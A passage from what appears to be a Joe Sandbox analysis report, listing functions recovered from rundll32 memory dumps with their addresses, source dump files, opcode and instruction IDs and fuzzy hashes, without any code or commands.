                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5601DC2AB093901BDF1A1BB5285122FAF5ADFC1250F084876EE09CB311ED24EC01C3A1
                                                                                                                                                                                                                                                                                                Function 04972258 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: ee78a966e61c47a7f7d9708ca60f2e26716c5f86717c09ffca4bc8044d84c6bc
                                                                                                                                                                                                                                                                                                • Instruction ID: c9fc91c4f5a04b6240164e0093f98e979a44bbc8751358374d2c84f6b11fb1c5
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee78a966e61c47a7f7d9708ca60f2e26716c5f86717c09ffca4bc8044d84c6bc
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E021F975E112159FCB49DF68D88099EBBF2FF8C710B10816AE915EB364DB319842CFA0
                                                                                                                                                                                                                                                                                                Function 04971958 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 2355166f365ef1a0cb0dc6feefbf51f2b0a2e58f04c2048aab36e9c89115bd47
                                                                                                                                                                                                                                                                                                • Instruction ID: b24016ffd369a7c367943e6ff9199adf219e1a3eeebec21d9dab72c9280707c2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2355166f365ef1a0cb0dc6feefbf51f2b0a2e58f04c2048aab36e9c89115bd47
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7111B630600155EFD744DF64E455AA9BBB2EFCC320F149859E80AD7385CF389C45CB90
                                                                                                                                                                                                                                                                                                Function 04972B08 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: a5c84a83f3ee550ce3d6b190547c8f14736c55723677d6558866a8d07d087e53
                                                                                                                                                                                                                                                                                                • Instruction ID: c27a1b51a68c6ab2bfc02e50b7bc2a21de7e08d7c1fd9f976eaa695b39764cd0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a5c84a83f3ee550ce3d6b190547c8f14736c55723677d6558866a8d07d087e53
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D014570B142258F8B51EB7C54601AF7BE29FC8605B100079C80ACB380EF30D943CBE2
                                                                                                                                                                                                                                                                                                Function 04971378 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 9ec1e69e645116a6e5cf80b2b0490f6f389749ce18ac0b4739a6f144598c9dfc
                                                                                                                                                                                                                                                                                                • Instruction ID: 53e33cdf6c4b56b5af7b57cd41a5e3040ee3a9bbe2c81ab395ba125be6fee257
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ec1e69e645116a6e5cf80b2b0490f6f389749ce18ac0b4739a6f144598c9dfc
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D32102B09042098FDB10DFAAC881AEEFBF4FF48320F10842AD459A7250C7786945CFA1
                                                                                                                                                                                                                                                                                                Function 04971380 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 169f8733d99c62fc4c770c2742ef7e58f685607784fd342c32a43aa09518ac10
                                                                                                                                                                                                                                                                                                • Instruction ID: 49d74b56a5d5da01c5514eb060cbfd7b186c42d208eddbb740f3c82816bab910
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 169f8733d99c62fc4c770c2742ef7e58f685607784fd342c32a43aa09518ac10
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C711E0B59042498BDB10DFAAC881BAEFBF4FB48324F10842AD459A7250C778A945CFA5
                                                                                                                                                                                                                                                                                                Function 04971968 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: d9a5221370f910e9880443cf1ab27da795f4041586a3134b24221bc66c5fcfad
                                                                                                                                                                                                                                                                                                • Instruction ID: f9e4b8910998125a5a710b4bf35062a4698eb7cadc7d150d6943e8a1f786a58d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d9a5221370f910e9880443cf1ab27da795f4041586a3134b24221bc66c5fcfad
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1118271600154EFCB44DF64E454AA97BB6EF8C320F145469E809E7340CF799C45CB90
                                                                                                                                                                                                                                                                                                Function 04972A68 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: b29f123acd5581d2bc436394d7498a7f7ce3cf349eb716870dd66a18db298372
                                                                                                                                                                                                                                                                                                • Instruction ID: 91005e89396e48f4b4ed554b2bf322e293cf882b9935ae5339668d31e54effdd
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b29f123acd5581d2bc436394d7498a7f7ce3cf349eb716870dd66a18db298372
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43017175B552218FCB05EF3895516AEBBB1EF88A15B20047AD809DB361EB349943CBD0
                                                                                                                                                                                                                                                                                                Function 04971440 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 16dd375ca31e80927484965d21d43e3584a3fe9e0e2fcfcf25bd47b7814b4922
                                                                                                                                                                                                                                                                                                • Instruction ID: 3577898fb5eae232fbd283b6650db5d9e49ec7f07a08615b882844234d757233
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 16dd375ca31e80927484965d21d43e3584a3fe9e0e2fcfcf25bd47b7814b4922
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3001F7306492495FCB49AF7865762267FE9DFC12107051CBDC549CB3A2ED28D8458791
                                                                                                                                                                                                                                                                                                Function 02D4D005 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.1708600248.0000000002D4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D4D000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2d4d000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 245931a2d41ca592e4c76337b2b49a1680684c0ce6f83fb89c6a3a9d8dc60f7c
                                                                                                                                                                                                                                                                                                • Instruction ID: 9ca8a609a2e40640223b0151e9b96bb2ce4cc36f8899964b9c7c117aff771930
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 245931a2d41ca592e4c76337b2b49a1680684c0ce6f83fb89c6a3a9d8dc60f7c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73010C6140E3C09FD7128B258894B52BFB4EF53224F1DC5DBE9888F2A7C2699849C772
                                                                                                                                                                                                                                                                                                Function 02D4D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.1708600248.0000000002D4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D4D000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2d4d000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 84705085f3eebdad47e9edb9bcbee9f086e96545752681d81f98ef84e5c41549
                                                                                                                                                                                                                                                                                                • Instruction ID: 6a5808dce1e10b0af1839182d213633f83cec18fd13f2c767c834b9553d62b5f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 84705085f3eebdad47e9edb9bcbee9f086e96545752681d81f98ef84e5c41549
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4901DB715083409BE7104B25CD84767BF99DF41324F28C52AED484F386CB79EC45C6B1
                                                                                                                                                                                                                                                                                                Function 0497182A Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: f9436fe1195aaccd2cc0440eebd7bdc54b9577f4073535b59cb7838b082e2c24
                                                                                                                                                                                                                                                                                                • Instruction ID: aa5f82b0cd20e0180439126e2cb572e990220c1cdc63feb393e82e4f61ce30e3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f9436fe1195aaccd2cc0440eebd7bdc54b9577f4073535b59cb7838b082e2c24
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9201D131B0021687EB19AA6895663EF7BF79BC8304F20443EC102F73C0CE796D068B90
                                                                                                                                                                                                                                                                                                Function 04972997 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 7663239e801fb2501967de186653cefa6f0b34570a51d39642894219f7952c27
                                                                                                                                                                                                                                                                                                • Instruction ID: 3ef52ee45efbd31ecdccd97c1ed0894011315285a32f160befe938f393f618a9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7663239e801fb2501967de186653cefa6f0b34570a51d39642894219f7952c27
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56012D303002118FEB1EAB74E95465E7F22EF81304B104579D142DF2D2EF20E8CA87E0
                                                                                                                                                                                                                                                                                                Function 04972A78 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 16f14ab338cf60d7ce534765d1aef3e6d82088a6c1c7e3333631676530de0d78
                                                                                                                                                                                                                                                                                                • Instruction ID: a7945f3845fea21b169938e7903e995449000d1082bb646b807c2e95d73e3c45
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 16f14ab338cf60d7ce534765d1aef3e6d82088a6c1c7e3333631676530de0d78
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30018178B112148FCB14EF78D5056AEBBF5EB88611B10047AE909D7360EB359D42CB90
                                                                                                                                                                                                                                                                                                Function 04970F30 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: cef9365d1208b9ba33eaba9b9740b240d585b774fc771fd736e6da61a434f5a8
                                                                                                                                                                                                                                                                                                • Instruction ID: 3872649c9571edbc6d0b922362cf51f938c5d456b4bebcc4c50b3c96dc3df733
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cef9365d1208b9ba33eaba9b9740b240d585b774fc771fd736e6da61a434f5a8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6F0E20174E2E91FD747267C092205E2F668F83604B5A09F7C549EB3D3DC04AC0A83EA
                                                                                                                                                                                                                                                                                                Function 04971BB0 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 5030a25e7473ae96be36a4811a327a633f0669a69e96ca7e675142daddac4949
                                                                                                                                                                                                                                                                                                • Instruction ID: 8da257edf8b82a4301559328c7650e01f603176dcacaebf7cb1c7f46cc6712ba
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5030a25e7473ae96be36a4811a327a633f0669a69e96ca7e675142daddac4949
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9F02E797453505BDB255A65A59032AAF5D5FD4164F09007ADD44CB356DE20DC02C3D0
                                                                                                                                                                                                                                                                                                Function 049729A8 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: ce8e5d228cf724bbcd900d279c8c46e16e537007724d5028fbeb287f4284ce47
                                                                                                                                                                                                                                                                                                • Instruction ID: 9f474a43e5d690b1fba4ec92f6c5eec92b771500f0276d880f54033c8bd2f4ab
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce8e5d228cf724bbcd900d279c8c46e16e537007724d5028fbeb287f4284ce47
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 94F096303102108BDB5D6FB4D9056597B56EB81315B104979E5069B394DF61ECC48BE4
                                                                                                                                                                                                                                                                                                Function 04971431 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 3f2b729d297f3b91164e1aaaa605da1907c678432a88512d4bced37a5dd3acc9
                                                                                                                                                                                                                                                                                                • Instruction ID: c6066af8d45a10bfe85be34148268e7efa8b93910f8da48f87b37e1fea63ad47
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f2b729d297f3b91164e1aaaa605da1907c678432a88512d4bced37a5dd3acc9
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9BF0B470A84145AFD748AF7862A72267FEAEFC42107051C7DC146CF3A5EE29D8458B91
                                                                                                                                                                                                                                                                                                Function 04972A20 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: a9139f94fadb62445b53383e16c4198d217b99f477c8c1d401179312e0bc30a0
                                                                                                                                                                                                                                                                                                • Instruction ID: 29373edf40f2691e9b787b90c38c6304fae0f5707ecfc8cc604a6d9e9559974f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a9139f94fadb62445b53383e16c4198d217b99f477c8c1d401179312e0bc30a0
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F5E0DF3134A270CFA71F1AA638641FE3B999E82A15B1664A6E416D71D2EB0CCD438791
                                                                                                                                                                                                                                                                                                Function 04970F50 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 451f83fe69b494e10c2cb0ca3a3747402b31a6bae422a9da8129a24babac5885
                                                                                                                                                                                                                                                                                                • Instruction ID: f89f4bae73d0483c566b663a0a0c169203ba18576921ddbe1104e4e5d55cb000
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 451f83fe69b494e10c2cb0ca3a3747402b31a6bae422a9da8129a24babac5885
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EEF02B3130D2458FDB019B64E466615BF19EB41204B298DEAE18ACF313DD14E891C345
                                                                                                                                                                                                                                                                                                Function 04972959 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 3095fa762ce71f9563ed6f803b50b31cceba9d43e37fbf5d20911aa5c1c19a8a
                                                                                                                                                                                                                                                                                                • Instruction ID: 3287dc5c5b435a0ca70b8aacf51653e9d6a8b6beaf58a4230c28e47c94bd077a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3095fa762ce71f9563ed6f803b50b31cceba9d43e37fbf5d20911aa5c1c19a8a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84E0D8B594A2059FCB01CFA4DD915CDBF74DE0520472041A6C444D7263FA304B0387D1
                                                                                                                                                                                                                                                                                                Function 04972A30 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: e8efe09818d1d1acf8fcd9812859f9cd3032ca318059bba3cde0d751b98634dc
                                                                                                                                                                                                                                                                                                • Instruction ID: ea5dd01461e8b9f2a46172cded88b637cc573c061747c04b55b1e4ee853bc989
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e8efe09818d1d1acf8fcd9812859f9cd3032ca318059bba3cde0d751b98634dc
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ACD02B30311124C7DB1D1FB764042BE358CDF42651F012075F42AE22C0DF0CDD414384
                                                                                                                                                                                                                                                                                                Function 04975EB0 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 84113bfd48e96fb3a8a0970ad958935d4023e8876d49c54d960e891a11386f07
                                                                                                                                                                                                                                                                                                • Instruction ID: fe858fc9bab1452b4c192e6433e118ab4112899196792b5e777900a9314c1ec1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 84113bfd48e96fb3a8a0970ad958935d4023e8876d49c54d960e891a11386f07
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FEE0C2312586200FD701976CA4514847B749F0A714B0600EAD146CB6A3C6958C038784
                                                                                                                                                                                                                                                                                                Function 04970C48 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: a7c6d39e52c395cb94c3d809f4212768b800c332298c2523093d2cb7b17cd719
                                                                                                                                                                                                                                                                                                • Instruction ID: 2cb26e6ce9aa51471740d7bb4ba179cc1111eb3af224859f5ce6d2e4e2025342
